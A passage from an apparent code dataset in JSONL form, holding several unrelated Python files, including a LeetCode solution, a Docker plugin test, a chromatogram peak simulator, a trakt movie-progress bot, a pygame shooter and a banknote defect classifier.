arg1)\n print(\"arg2:\", arg2)\n print(\"arg3:\", arg3)\n\n\nif __name__ == \"__main__\":\n test_var_args('a', 'b', 'c', 'd')\n test_var_args('a', ('b', 'c', 'd'))\n\n greet_me(name=\"a\")\n\n kw = {\"name\": \"a\", \"age\": 12}\n greet_me(**kw)\n\n args = ('aaa', 1, 2)\n test_argv_kwargv(*args)\n\n kwargs = {\"arg1\": 1, \"arg2\": \"v2\", \"arg3\" : \"v3\"}\n test_argv_kwargv(**kwargs)\n","sub_path":"basic/func_args.py","file_name":"func_args.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"465051174","text":"# 1054. Distant Barcodes\n\n# 2021/02/16\n# Runtime: 524 ms, faster than 31.97% of Python3 online submissions for Distant Barcodes.\n# Memory Usage: 16.9 MB, less than 10.49% of Python3 online submissions for Distant Barcodes.\n\n# 和 lc 767一模一样,贪心算法,技巧性很强\n\n\nclass Solution:\n def rearrangeBarcodes(self, barcodes: List[int]) -> List[int]:\n counts = {}\n for num in barcodes:\n counts[num] = counts.get(num, 0) + 1\n heap = [(-val, num) for num, val in counts.items()]\n heapq.heapify(heap)\n ans = []\n while len(heap) > 1:\n c1, n1 = heapq.heappop(heap)\n c2, n2 = heapq.heappop(heap)\n ans.extend([n1, n2])\n if c1 + 1:\n heapq.heappush(heap, (c1 + 1, n1))\n if c2 + 1:\n heapq.heappush(heap, (c2 + 1, n2))\n return ans + ( [ heap[0][1] ] if heap else [] )","sub_path":"1054. Distant Barcodes.py","file_name":"1054. Distant Barcodes.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"89097999","text":"\"\"\"\nCopyright (c) 2015 Red Hat, Inc\nAll rights reserved.\n\nThis software may be modified and distributed under the terms\nof the BSD license. See the LICENSE file for details.\n\"\"\"\n\nfrom __future__ import print_function\n\nimport os\ntry:\n from collections import OrderedDict\nexcept ImportError:\n # Python 2.6\n from ordereddict import OrderedDict\nfrom dock.core import DockerTasker\nfrom dock.inner import DockerBuildWorkflow\nfrom dock.plugin import PreBuildPluginsRunner\nfrom dock.plugins.pre_add_labels_in_df import AddLabelsPlugin\nfrom dock.util import ImageName\n\n\nclass X(object):\n image_id = \"xxx\"\n git_dockerfile_path = None\n git_path = None\n base_image = ImageName(repo=\"qwe\", tag=\"asd\")\n\n\ndef test_addlabels_plugin(tmpdir):\n df = \"\"\"\\\nFROM fedora\nRUN yum install -y python-django\nCMD blabla\"\"\"\n tmp_df = os.path.join(str(tmpdir), 'Dockerfile')\n with open(tmp_df, mode=\"w\") as fd:\n fd.write(df)\n\n tasker = DockerTasker()\n workflow = DockerBuildWorkflow(\"asd\", \"test-image\")\n setattr(workflow, 'builder', X)\n setattr(workflow.builder, 'df_path', tmp_df)\n\n labels_conf = OrderedDict({'label1': 'value 1', 'label2': 'long value'})\n\n runner = PreBuildPluginsRunner(\n tasker,\n workflow,\n [{\n 'name': AddLabelsPlugin.key,\n 'args': {'labels': labels_conf}\n }]\n )\n runner.run()\n assert AddLabelsPlugin.key is not None\n with open(tmp_df, 'r') as fd:\n altered_df = fd.read()\n # Can't be sure of the order of the labels, expect either\n expected_output = [r\"\"\"FROM fedora\nRUN yum install -y python-django\nLABEL \"label1\"=\"value 1\" \"label2\"=\"long value\"\nCMD blabla\"\"\",\n r\"\"\"FROM fedora\nRUN yum install -y python-django\nLABEL \"label2\"=\"long value\" \"label1\"=\"value 1\"\nCMD blabla\"\"\"]\n assert altered_df in expected_output\n","sub_path":"tests/plugins/test_add_labels.py","file_name":"test_add_labels.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"429068957","text":"import numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm, skewnorm\n\nclass PeakModel: \n @classmethod\n def peak(cls, maxcps, datapoints, dwelltime, skew = 0, sigma = 3, location = 0):\n location = 0\n scale = 1\n alpha = skew\n# delta = alpha / np.sqrt(1+alpha**2)\n# uz = np.sqrt(2/np.pi) * delta\n# sigmaz = np.sqrt(1.0-uz**2.0)\n# gamma = (4-np.pi)/2 * (delta*np.sqrt(2/np.pi))**3/(1-2*delta**2/np.pi)**(3/2)\n# moa = uz - (gamma * sigmaz / 2) - (np.sign(alpha))*np.exp(-2*np.pi/np.abs(alpha))\n# mode = location + scale * moa\n# _norm_ = skewnorm.pdf(x=mode, a=alpha, loc=location, scale=scale) # 標準正規分布の高さ\n\n times = np.linspace(-sigma, sigma, datapoints)\n _refpeak_ = skewnorm.pdf(x = times, a=alpha, loc=0, scale=scale)\n # _refpeak_ = [skewnorm.pdf(x = time, a=alpha, loc=0, scale=scale) for time in times]\n _norm_ = np.max(_refpeak_)\n maxindex = np.argmax(_refpeak_)\n maxtime = times[maxindex]\n # refpeak = np.array(_refpeak_) * maxcps / _norm_\n # refpeak = np.array([skewnorm.pdf(x=time, a=alpha, loc= location - maxtime, scale=scale) * maxcps / _norm_ for time in times])\n #refpeak = np.array(skewnorm.pdf(x=times, a=alpha, loc= location - maxtime, scale=scale) * maxcps / _norm_ )\n refpeak = skewnorm.pdf(x=times, a=alpha, loc= location - maxtime, scale=scale) * maxcps / _norm_ \n # print('maxindex:', maxindex)\n # print('maxpos:', maxtime)\n # samplepeak = np.array([np.random.poisson(peak * dwelltime / 1000) * 1000 / dwelltime for peak in refpeak])\n # return times, refpeak, samplepeak \n return refpeak\n @classmethod\n def simulate(cls, dwelltime, chrom):\n # simulated = np.array([np.random.poisson(chromdata * dwelltime / 1000) * 1000 / dwelltime for chromdata in chrom])\n simulated = np.random.poisson(chrom * dwelltime / 1000) * 1000 / dwelltime\n return simulated\n @classmethod\n def baseline(cls, level, datapoints, dwelltime):\n sample = np.array(np.random.poisson(level * dwelltime / 1000, datapoints) * 1000)\n # sample = np.array([np.random.poisson(level * dwelltime / 1000) * 1000 / dwelltime for i in np.arange(datapoints)])\n variation = np.max(sample) - np.min(sample)\n return sample, variation\n @classmethod\n def spikenoise(cls, datapoints):\n sample = np.array([np.random.poisson(1) for i in np.arange(datapoints)])\n # print(sample)\n return sample\n @classmethod\n def zscore(cls, x, axis = None):\n xmean = np.mean(x, axis=axis, dtype='float')\n xstd = np.std(x, axis=axis, keepdims=True)\n zscore = (x-xmean)/xstd\n return zscore\n @classmethod\n def normalize(cls, x, factor=None, axis=None):\n if factor:\n return x/factor, factor\n xmax = np.max(x, axis=axis)\n if xmax == 0:\n return x, 1\n normalized = x/xmax\n return normalized, xmax\n @classmethod\n def normalize_and_spike(cls, x, noise_rate=0.03, normalization_factor=None, axis=None):\n if normalization_factor:\n return x/normalization_factor, normalization_factor\n xmax = np.max(x, axis=axis)\n if xmax == 0:\n normalized = x\n xmax = 1\n else:\n normalized = x/xmax\n noise_count = int(len(normalized) * noise_rate)\n _id = np.arange(len(normalized))\n np.random.shuffle(_id)\n _id = _id[0:noise_count]\n normalized[_id] = 1\n return normalized, xmax\n\n @classmethod\n def chrom(cls, datapoints, dwelltime, min_peaknumber, max_peaknumber, peak_dynamicrange, min_peakwidth, max_peakwidth):\n baselinelevel = 10**(np.random.rand() * 3)\n peaknumber = np.random.randint(min_peaknumber, max_peaknumber + 1)\n # SNRs = [3 + np.random.rand() * (10 ** (peak_dynamicrange - 1)) for i in np.arange(peaknumber)]\n\n base, noiselevel = PeakModel.baseline(level= baselinelevel, datapoints= datapoints, dwelltime=dwelltime)\n\n if noiselevel < 100:\n noiselevel = 100\n\n Skews = [np.random.rand() * 5 for i in np.arange(peaknumber)]\n PeakHeights = [np.random.randint(noiselevel*3, noiselevel*(3+np.random.rand()*(10**(peak_dynamicrange-1)))+1) for i in np.arange(peaknumber)]\n PeakWidths = [np.random.randint(min_peakwidth, max_peakwidth + 1) for i in np.arange(peaknumber)]\n \n Peaks = [PeakModel.peak(maxcps = PeakHeights[i], datapoints = PeakWidths[i], dwelltime = dwelltime, skew=Skews[i]) for i in np.arange(peaknumber)]\n Positions = [np.random.randint(0, datapoints) for i in np.arange(peaknumber)]\n\n # ゼロレベルにピークを配置してピークだけのクロマトを作成\n RefChrom = np.zeros(datapoints) + baselinelevel\n NormalizedPeakPositions = np.zeros((peaknumber, 3)) # (start, end, class(=1))\n for i in np.arange(peaknumber):\n peak = Peaks[i]\n pos = Positions[i]\n width = PeakWidths[i]\n if width % 2 == 0: # 偶数\n startpos = int(pos - width/2)\n endpos = startpos + width\n else:\n startpos = int(pos - (width-1)/2)\n endpos = startpos + width\n if startpos >= 0 and endpos < datapoints:\n RefChrom[startpos:startpos+width] += peak\n peakpos_min = startpos\n peakpos_max = startpos+width\n else:\n if startpos < 0 and endpos < datapoints:\n RefChrom[0:endpos] += peak[-startpos:width]\n peakpos_min = 0\n peakpos_max = endpos\n if startpos >= 0 and endpos >= datapoints:\n RefChrom[startpos:datapoints] = peak[0:datapoints-startpos]\n peakpos_min = startpos\n peakpos_max = datapoints\n # poakpos_min, peakpos_maxを正規化\n NormalizedPeakPositions[i,0] = (peakpos_min + 0.5) / datapoints\n NormalizedPeakPositions[i,1] = (peakpos_max - 0.5) / datapoints\n NormalizedPeakPositions[i,2] = 1 # ピークデータクラスを表す1をハードコード\n\n # パルスカウントシミュレーションデータを作成\n simulated = PeakModel.simulate(dwelltime, RefChrom)\n Chrom = base + simulated\n\n return Chrom, RefChrom, NormalizedPeakPositions\n\nif __name__ == '__main__': \n CHROM, REF, Positions = PeakModel.chrom(1024, dwelltime=1, min_peaknumber=5, max_peaknumber=8, peak_dynamicrange=2, min_peakwidth=20, max_peakwidth=100)\n # CHROM, factor = PeakModel.normalize_and_spike(CHROM)\n RealPositions = Positions * 1024\n CHROM, factor = PeakModel.normalize(CHROM)\n REF, factor = PeakModel.normalize(REF)\n print(np.sort(RealPositions, axis=0))\n plt.plot(CHROM)\n plt.show()\n plt.plot(REF)\n plt.show()\n\n","sub_path":"peakmodel.py","file_name":"peakmodel.py","file_ext":"py","file_size_in_byte":7041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"162483055","text":"#!/usr/bin/python3\n\"\"\"module: 2-read_lines\"\"\"\n\n\ndef read_lines(filename=\"\", nb_lines=0):\n \"\"\"method: read_lines\"\"\"\n with open(filename, 'r', encoding='utf8') as f:\n nl = sum(1 for line in open(filename))\n if nb_lines <= 0 or nb_lines > nl:\n print(f.read(), end=\"\")\n else:\n for line in range(0, nb_lines):\n print(f.readline(), end=\"\")\n f.closed\n","sub_path":"0x0B-python-input_output/2-read_lines.py","file_name":"2-read_lines.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"270258900","text":"def trakt_movie_progress(mail):\n import datetime, time, json, requests, pprint\n from database import Tmdbmoviecollection, Tmdbcollectioninfo, Users\n from peewee import IntegrityError, DoesNotExist\n print(\"TRAKT MOVIE PROGRESS CALLED!\")\n try:\n sender = Users.get(Users.username == mail.author)\n # if sender.last_trakt_movie_progress_date >= (datetime.datetime.now() - datetime.timedelta(hours=1))\\\n # and not mail.author.name in [\"pcjonathan\", \"SwiftPanda16\"]:\n # mail.mark_as_read()\n # mail.reply(\"To help avoid rate limit issues/clogging the bot up, this feature is limited to once \"\n # \"per hour per user. Please try again soon. Thanks for your understanding\")\n # return\n # else:\n # sender.last_trakt_movie_progress_date = datetime.datetime.now()\n # sender.save()\n sender.last_trakt_movie_progress_date = datetime.datetime.now()\n sender.save()\n except DoesNotExist:\n sender = Users.create(username = mail.author, last_trakt_movie_progress_date = datetime.datetime.now())\n\n import trakt, trakt.users, trakt.errors\n from auth import AUTH\n trakt.core.OAUTH_TOKEN = AUTH[\"trakt\"][\"oauth_token\"]\n trakt.core.CLIENT_ID = AUTH[\"trakt\"][\"client_id\"]\n trakt.core.CLIENT_SECRET = AUTH[\"trakt\"][\"client_secret\"]\n trakt.core.APPLICATION_ID = AUTH[\"trakt\"][\"application_id\"]\n trakt.core.AUTH_METHOD = trakt.core.OAUTH_AUTH\n try:\n trakt_movies = trakt.users.User(mail.body).watched_movies\n # except trakt.errors.OAuthException:\n # print(\"Private. *facepalm*\")\n # mail.reply(\"Your trakt profile must be public for the watched movies list to be downloaded. Please make it \"\n # \"public then try again. You can always make it private again afterwards!\")\n # mail.mark_as_read()\n # return\n except trakt.errors.NotFoundException:\n print(\"User not found\")\n mail.reply(\"The user you have entered cannot be found. Please try again, double-checking you have the \"\n \"username right.\")\n mail.mark_as_read()\n return\n watched = []\n for movie in trakt_movies:\n watched.append(movie.tmdb)\n print(\"Grabbed {} watched movies!\".format(len(watched)))\n import tmdbsimple\n from requests.exceptions import HTTPError\n tmdbsimple.API_KEY = AUTH[\"api\"][\"tmdb\"]\n complete = []\n incomplete = []\n responses = [\"\"]\n while len(watched) > 0:\n print(\"Debug: {} movies left to process\".format(len(watched)))\n if len(watched) == 1072:\n print(51)\n movie = watched.pop(0)\n try:\n m = Tmdbmoviecollection.get(Tmdbmoviecollection.movieid == movie)\n if m.lastupdated < (datetime.datetime.now() - datetime.timedelta(weeks=1)) or len(watched) == 1071:\n c = tmdbsimple.Movies(movie).info()[\"belongs_to_collection\"]\n if c is None:\n m.collectionid = None\n else:\n m.collectionid = c[\"id\"]\n m.lastupdated = datetime.datetime.now()\n m.save()\n time.sleep(0.5)\n m = m.collectionid\n except (DoesNotExist, HTTPError) as e:\n print(e)\n try:\n m = tmdbsimple.Movies(movie).info()[\"belongs_to_collection\"]\n except requests.exceptions.HTTPError as e:\n if e.response.status_code == 404:\n continue\n else:\n raise requests.HTTPError\n if m is not None:\n m = m[\"id\"]\n Tmdbmoviecollection.create(movieid = movie, collectionid = m)\n time.sleep(0.5)\n except Exception as e:\n print(e)\n if m is None:\n continue\n\n else:\n\n #collection = tmdbsimple.Collections(m[\"belongs_to_collection\"][\"id\"]).info()\n try:\n col = Tmdbcollectioninfo.get(Tmdbcollectioninfo.collectionid == m)\n if col.lastupdated < (datetime.datetime.now() - datetime.timedelta(weeks=1)):\n collection = tmdbsimple.Collections(m).info()\n col.data = json.dumps(collection)\n col.lastupdated = datetime.datetime.now()\n col.save()\n time.sleep(0.5)\n collection = json.loads(col.data)\n except DoesNotExist:\n collection = tmdbsimple.Collections(m).info()\n Tmdbcollectioninfo.create(collectionid=m, data=json.dumps(collection))\n for part in collection[\"parts\"]:\n try:\n Tmdbmoviecollection.create(movieid=part[\"id\"], collectionid=collection[\"id\"])\n except IntegrityError:\n pass\n time.sleep(0.5)\n\n\n collection[\"complete\"] = True\n for part in collection[\"parts\"]:\n if part[\"release_date\"] == None:\n part[\"release_date\"] = \"None\"\n if part[\"id\"] == movie:\n part[\"watched\"] = True\n elif part[\"id\"] in watched:\n part[\"watched\"] = True\n watched.pop(watched.index(part[\"id\"]))\n else:\n part[\"watched\"] = False\n if part[\"release_date\"] != \"None\":\n if datetime.datetime.strptime(part[\"release_date\"], \"%Y-%m-%d\").date() <= datetime.date.today():\n collection[\"complete\"] = False\n\n collection[\"parts\"] = sorted(collection[\"parts\"], key=lambda part: part['release_date'])\n if collection[\"complete\"]:\n complete.append(collection)\n else:\n incomplete.append(collection)\n\n incomplete = sorted(incomplete, key=lambda col: col['name'])\n for col in incomplete:\n col_response = \"##{}\\n\\n\".format(col[\"name\"])\n for part in col[\"parts\"]:\n if part[\"watched\"]:\n col_response += \"* {}\\n\".format(part[\"title\"])\n elif part[\"release_date\"] is \"None\" or datetime.datetime.strptime(part[\"release_date\"], \"%Y-%m-%d\").date() \\\n <= \\\n datetime.date.today():\n col_response += \"* {}: **NOT WATCHED**\\n\".format(part[\"title\"])\n else:\n col_response += \"* {}: Not Released\\n\".format(part[\"title\"])\n col_response += \"\\n\\n\"\n if len(responses[-1] + col_response) <= 9770:\n responses[-1] += col_response\n else:\n responses.append(col_response)\n\n for i in range(len(responses)):\n if len(responses) == 1:\n mail.reply(\"Here is the list of incomplete movie collections:\\n\\n\"\n + responses[i] + \"Watch history taken from user's trakt account. \"\n \"Movie collection data from TheMovieDatabase\")\n else:\n mail.reply(\"Here is the list of incomplete movie collections. There are too many to list in a single \"\n \"message so they have been split up. Part {}/{}:\\n\\n\".format((i + 1), len(responses))\n + responses[i] + \"Watch history taken from user's trakt account. \"\n \"Movie collection data from TheMovieDatabase\")\n mail.mark_read()\n\n # if collection[\"complete\"]:\n # print(\"##### {}\".format(collection[\"name\"]))\n # for part in collection[\"parts\"]:\n # if datetime.datetime.strptime(part[\"release_date\"], \"%Y-%m-%d\").date() <= datetime.date.today():\n # print(part[\"title\"])\n # else:\n # print(\"{}: Not Released\".format(part[\"title\"]))\n # else:\n # print(\"##### {} - Incomplete!!\".format(collection[\"name\"]))\n # for part in collection[\"parts\"]:\n # if part[\"watched\"]:\n # print(part[\"title\"])\n # elif datetime.datetime.strptime(part[\"release_date\"], \"%Y-%m-%d\").date() <= datetime.date.today():\n # print(part[\"title\"] + \": NOT WATCHED\")\n # else:\n # print(\"{}: Not Released\".format(part[\"title\"]))\n #\n # print(\"\\n\")\n # print(\"Debug: {} movies left to process\".format(len(watched)))\n # time.sleep(0.5)\n #\n # unwatched = []\n # for col in collections:\n # for part in col[\"parts\"]:\n # if datetime.datetime.strptime(part[\"release_date\"], \"%Y-%m-%d\").date() <= datetime.date.today() and not \\\n # part[\"watched\"]:\n # unwatched.append(part)\n\n\n","sub_path":"trakt_movie_progress.py","file_name":"trakt_movie_progress.py","file_ext":"py","file_size_in_byte":8826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"590410858","text":"'''\n作者: zhangzongyan\n时间: 18-4-18\n'''\nimport pygame\nfrom pygame.locals import *\nimport plane\nimport enemy\nimport bullet\n\nSMALL_ENEMY_NUM = 15\nMID_ENEMY_NUM = 10\nBIG_ENEMY_NUM = 5\nBULLET_NUM = 15\nBUJI_NUM = 2\n\n# 创建指定个数的小型敌机 并加入组内\ndef add_small_enemy(group1, group2, num, bg_rect):\n for i in range(num):\n each = enemy.SmallEnemy(bg_rect)\n group1.add(each)\n group2.add(each)\n\n# 创建指定个数的中型敌机 并加入组内\ndef add_mid_enemy(group1, group2, num, bg_rect):\n for i in range(num):\n each = enemy.MidEnemy(bg_rect)\n group1.add(each)\n group2.add(each)\n\n# 创建指定个数的大型敌机 并加入组内\ndef add_big_enemy(group1, group2, num, bg_rect):\n for i in range(num):\n each = enemy.BigEnemy(bg_rect)\n group1.add(each)\n group2.add(each)\n#创建指定个数的补给 并加入敌机组\ndef add_buji_enemy(group1, group2, num, bg_rect):\n for i in range(num):\n each = enemy.BuJi(bg_rect)\n group1.add(each)\n group2.add(each)\n# 改变敌机组内敌机速度\ndef speed_increace(group, inc):\n for e in group:\n e.speed += inc\ndef main():\n # 初始化游戏\n pygame.init()\n life_image = pygame.image.load(\"../images/life.png\")\n life_rect = life_image.get_rect()\n life_num = 3\n # 游戏窗口\n screen = pygame.display.set_mode((480, 680))\n # bg图片\n bg_img = pygame.image.load(\"../images/background.png\").convert_alpha()\n\n # 回去背景的宽度和高度\n width = bg_img.get_rect().width\n height = bg_img.get_rect().height\n\n # 标题\n pygame.display.set_caption(\"飞机大战--Bata\")\n #设置重新开始按钮和结束按钮\n game_over = pygame.image.load(\"./images/gameover.png\").convert_alpha()\n game_rect = game_over.get_rect()\n\n again_image = pygame.image.load(\"./images/again.png\").convert_alpha()\n again_rect = again_image.get_rect()\n # 实例化我方飞机\n myplane = plane.MyPlane(bg_img.get_rect())\n\n #控制图片切换速度\n delay = 0\n change_img = False\n\n # 敌机组\n enemies_group = pygame.sprite.Group()\n # 小敌机组\n smallEny_group = pygame.sprite.Group()\n # 实例化小型机-->15个\n add_small_enemy(smallEny_group, enemies_group, SMALL_ENEMY_NUM, bg_img.get_rect())\n\n # 中敌机组\n midEny_group = pygame.sprite.Group()\n add_mid_enemy(midEny_group, enemies_group, MID_ENEMY_NUM, bg_img.get_rect())\n\n # 大敌机组\n bigEny_group = pygame.sprite.Group()\n add_big_enemy(bigEny_group, enemies_group, BIG_ENEMY_NUM, bg_img.get_rect())\n #补给\n buji_group = pygame.sprite.Group()\n add_buji_enemy(buji_group, enemies_group, BUJI_NUM, bg_img.get_rect())\n\n # 销毁索引\n mid_index = 0\n big_index = 0\n me_index = 0\n bullet_index = 0\n\n #print(myplane.rect.width)\n #print(myplane.rect.midtop)\n\n # 实例化子弹对象\n bullet_group = pygame.sprite.Group()\n bulletlist = []\n for i in range(BULLET_NUM):\n b = bullet.Bullet(myplane.rect.midtop)\n bullet_group.add(b)\n bulletlist.append(b)\n\n # 设置刷新速度\n clock = pygame.time.Clock()\n\n # 显示分数\n score = 0\n # font对象\n fnt = pygame.font.Font('../font/myfont.ttf', 24)\n\n # 背景音乐\n pygame.mixer.init()\n pygame.mixer.music.load(\"../sound/game_music.ogg\")\n pygame.mixer.music.play(-1)\n\n # 暂停播放按钮\n pause_nor_img = pygame.image.load(\"../images/pause_nor.png\")\n pause_pressed_img = pygame.image.load(\"../images/pause_pressed.png\")\n resume_nor_img = pygame.image.load(\"../images/resume_nor.png\")\n resume_pressed_img = pygame.image.load(\"../images/resume_pressed.png\")\n pause_img = pause_nor_img\n pause_rect = pause_img.get_rect()\n pause_rect.left, pause_rect.top = (width-pause_rect.width -5, 5)\n pause_flag = False\n\n # 等级\n level = 1\n\n # 炸弹\n bomb_img = pygame.image.load(\"../images/bomb.png\").convert_alpha()\n bomb_rect = bomb_img.get_rect()\n bomb_rect.left, bomb_rect.top = (5, height-bomb_rect.height-5)\n bom_num = 3\n fnt2 = pygame.font.Font('../font/myfont.ttf', 48)\n # 生命数量\n life_image = pygame.image.load(\"../images/life.png\")\n life_rect = life_image.get_rect()\n life_num = 3\n\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n exit(1)\n elif event.type == MOUSEBUTTONDOWN:\n # 点击鼠标左键 并在按钮区域\n if event.button == 1 and pause_rect.collidepoint(event.pos):\n pause_flag = not pause_flag\n elif event.type == MOUSEMOTION:\n if pause_rect.collidepoint(event.pos):\n if pause_flag:\n # 暂停\n pause_img = resume_pressed_img\n else:\n pause_img = pause_pressed_img\n else:\n if pause_flag:\n pause_img = resume_nor_img\n else:\n pause_img = pause_nor_img\n elif event.type == KEYDOWN:\n if event.key == K_SPACE:\n # 放炸弹\n if bom_num > 0:\n for e in enemies_group:\n\n if e.alive and e.rect.top > 0:\n if e not in buji_group:\n e.alive = False\n bom_num -= 1\n else:\n bom_num = 0\n\n\n\n\n\n # 画背景图片\n screen.fill((255, 255, 255))\n screen.blit(bg_img, bg_img.get_rect())\n if not pause_flag:\n # 判断等级\n if level == 1 and score > 50000:\n level = 2\n # 多5个小敌机 2中敌机 1大敌机\n add_small_enemy(smallEny_group, enemies_group, 5, bg_img.get_rect())\n add_mid_enemy(midEny_group, enemies_group, 2, bg_img.get_rect())\n add_big_enemy(bigEny_group, enemies_group, 1, bg_img.get_rect())\n # 小敌机速度+2 中敌机速度加1\n speed_increace(smallEny_group, 2)\n speed_increace(midEny_group, 1)\n elif level == 2 and score > 150000:\n level = 3\n # 多5个小敌机 2中敌机 1大敌机\n add_small_enemy(smallEny_group, enemies_group, 10, bg_img.get_rect())\n add_mid_enemy(midEny_group, enemies_group, 5, bg_img.get_rect())\n add_big_enemy(bigEny_group, enemies_group, 2, bg_img.get_rect())\n # 小敌机速度+2 中敌机速度加1\n speed_increace(smallEny_group, 3)\n speed_increace(midEny_group, 2)\n\n # 频繁按键\n pressedkeys = pygame.key.get_pressed()\n if pressedkeys[K_LEFT] or pressedkeys[K_a]:\n myplane.move_left()\n elif pressedkeys[K_RIGHT] or pressedkeys[K_d]:\n myplane.move_right()\n elif pressedkeys[K_UP] or pressedkeys[K_w]:\n myplane.move_up()\n elif pressedkeys[K_DOWN] or pressedkeys[K_s]:\n myplane.move_down()\n\n # 子弹重置\n if not delay % 2:\n bulletlist[bullet_index].reset(myplane.rect.midtop)\n bullet_index = (bullet_index + 1) % BULLET_NUM\n\n # 绘制子弹\n for d in bullet_group:\n if d.alive:\n d.move()\n screen.blit(d.image, d.rect)\n # 子弹是否与敌机发生碰撞\n colleny = pygame.sprite.spritecollide(d, enemies_group, False, pygame.sprite.collide_mask)\n for e in colleny:\n if e in smallEny_group:\n score += 1000\n e.alive = False\n elif e in buji_group:\n e.alive = True\n else:\n e.energy -= 1\n if e.energy == 0:\n if e in bigEny_group:\n score += 10000\n else:\n score += 5000\n e.alive = False\n d.alive = False\n\n # 绘制敌机\n for e in bigEny_group:\n if e.alive:\n e.move()\n if delay % 4 == 0:\n screen.blit(e.image1, e.rect)\n else:\n screen.blit(e.image2, e.rect)\n # 绘制血槽\n pygame.draw.line(screen, (0,0,0), (e.rect.left, e.rect.top-5), \\\n (e.rect.right, e.rect.top-5), 2)\n # 余血\n current_egy = e.energy / enemy.BigEnemy.energy\n if current_egy < 0.2:\n color_paint = (255, 0, 0)\n else:\n color_paint = (0, 255, 0)\n pygame.draw.line(screen, color_paint, (e.rect.left, e.rect.top - 5), \\\n (e.rect.left + e.rect.width * current_egy, e.rect.top - 5), 2)\n\n else:\n screen.blit(e.destroy_image[big_index], e.rect)\n if delay % 3 == 0:\n big_index += 1\n if big_index == 6:\n big_index = 0\n e.reset()\n\n for e in midEny_group:\n if e.alive:\n e.move()\n screen.blit(e.image, e.rect)\n # 绘制血槽\n pygame.draw.line(screen, (0, 0, 0), (e.rect.left, e.rect.top - 5), \\\n (e.rect.right, e.rect.top - 5), 2)\n # 余血\n current_egy = e.energy / enemy.MidEnemy.energy\n if current_egy < 0.2:\n color_paint = (255,0,0)\n else:\n color_paint = (0,255,0)\n pygame.draw.line(screen, color_paint, (e.rect.left, e.rect.top - 5), \\\n (e.rect.left+e.rect.width * current_egy, e.rect.top - 5), 2)\n else:\n screen.blit(e.destroy_image[mid_index], e.rect)\n if delay % 3 == 0:\n mid_index += 1\n if mid_index == 4:\n mid_index = 0\n e.reset()\n for e in smallEny_group:\n if e.alive:\n e.move()\n screen.blit(e.image, e.rect)\n else:\n e.reset()\n for e in buji_group:\n if e.alive:\n e.move()\n screen.blit(e.image, e.rect)\n else:\n e.reset()\n\n # 检测敌机是否撞击我方飞机\n collide_plane = pygame.sprite.spritecollide(myplane, enemies_group, False, \\\n pygame.sprite.collide_mask)\n if collide_plane:\n # 发生碰撞\n for e in collide_plane:\n if e in buji_group:\n e.alive = False\n myplane.alive = True\n bom_num += 1\n else:\n e.alive = False\n myplane.alive = False\n\n myrender = fnt.render(\"Score:%d\" % score, True, (234, 222, 56))\n # 显示文字\n screen.blit(myrender, (5, 5))\n\n # 显示等级\n myrender = fnt.render(\"Level:%d\" % level, True, (234,222,56))\n screen.blit(myrender, (width-myrender.get_rect().width-5, height-myrender.get_rect().height-5))\n\n # 显示炸弹\n screen.blit(bomb_img, bomb_rect)\n myrender = fnt2.render(\"x %d\" % bom_num, True, (234,222,56))\n screen.blit(myrender, (bomb_rect.right+2, bomb_rect.top))\n\n if myplane.alive:\n if not change_img:\n screen.blit(myplane.image1, myplane.rect)\n else:\n screen.blit(myplane.image2, myplane.rect)\n else:\n # 销毁\n screen.blit(myplane.destroy_images[me_index], myplane.rect)\n if not delay % 10:\n me_index += 1\n if me_index == 4:\n\n life_num -= 1\n me_index = 0\n myplane.reset()\n\n if life_num == 0:\n game_rect.left, game_rect.top = (width-game_rect.width) / 2, 400\n screen.blit(game_over, game_rect)\n again_rect.left, again_rect.top = (width-again_rect.width) / 2, 300\n screen.blit(again_image, again_rect)\n if life_num:\n for i in range(life_num):\n screen.bilt(life_image,(width - 10 - (i + 1) * life_rect.width, \\\n height - 10 - life_rect.height))\n\n # 绘制暂停开始\n screen.blit(pause_img, pause_rect)\n\n delay += 1\n if delay % 5 == 0:\n change_img = True\n else:\n change_img = False\n pygame.display.update()\n clock.tick(60)\n\nif __name__ == '__main__':\n main()","sub_path":"zhangqi/FeiJi/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":13569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"100129597","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport sys\nimport os\nimport glob\nimport shutil\nimport fnmatch\nimport ntpath\nimport re\nimport cv2\nimport csv\nimport numpy as np \nimport pandas as pd\nfrom torchvision import datasets\nimport torchvision.transforms as transforms\nfrom torchvision.datasets import ImageFolder\nfrom torch.utils.data import DataLoader\nfrom PIL import ImageFile\nimport torch\nimport torch.nn as nn\nfrom model import MyNet\nfrom matplotlib import pyplot as plt\nfrom yattag import Doc\n#%matplotlib inline\nregex = re.compile(r'(\\d+)( \\((.+)\\))*.jpg')\n\n#classes for defect banknote\nclasses = {\n 'Dot': 'dot',\n 'Miss_print': 'miss_print',\n 'Over_ink': 'over_ink',\n 'Set_off': 'set_off',\n 'Under_ink': 'under_ink',\n 'Wiping': 'wiping',\n}\n\nclass_names = ['dot', 'miss_print', 'over_ink', 'set_off', 'under_ink', 'wiping']\n\n# instantiate the CNN\nuse_cuda = torch.cuda.is_available()\nlayer_sizes = [512, 256, 128]\nmodel = MyNet(output_size=6, layer_sizes=layer_sizes)\nif use_cuda:\n model = model.cuda()\n\nmodel.load_state_dict(torch.load('model/model_resnet101_512_256_128_back.pt', map_location=torch.device('cpu')))\n\n\n# ### Get the directory path from the argument\n\nif __name__ == \"__main__\":\n dir_path = sys.argv[1].strip()\n#in put the directory path\n#dir_path = input('Enter the images directory path: ').strip()\n\n#print(dir_path)\n#delete the 